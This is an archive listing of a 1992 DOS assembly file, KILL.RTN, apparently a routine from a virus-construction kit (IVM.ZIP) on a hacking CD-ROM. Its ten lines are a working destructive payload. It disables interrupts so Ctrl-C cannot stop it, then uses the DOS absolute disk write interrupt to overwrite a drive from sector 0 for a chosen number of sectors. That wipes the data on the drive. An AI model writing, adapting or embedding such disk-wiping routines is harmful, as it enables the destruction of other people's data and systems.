home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
HPAVC
/
HPAVC CD-ROM.iso
/
IVM.ZIP
/
ROUTINES
/
KILL.RTN
< prev
next >
Wrap
Text File
|
1992-12-25
|
364b
|
10 lines
; Kills the drive
; AL=Drive 0=A:, 1=B:, etc...
; CX=Number of sectors.
cli ; Disable interrupts (no Ctrl-C)
cwd ; Clear DX (start with sector 0)
int 026h ; DOS absolute write interrupt
sti ; Restore interrupts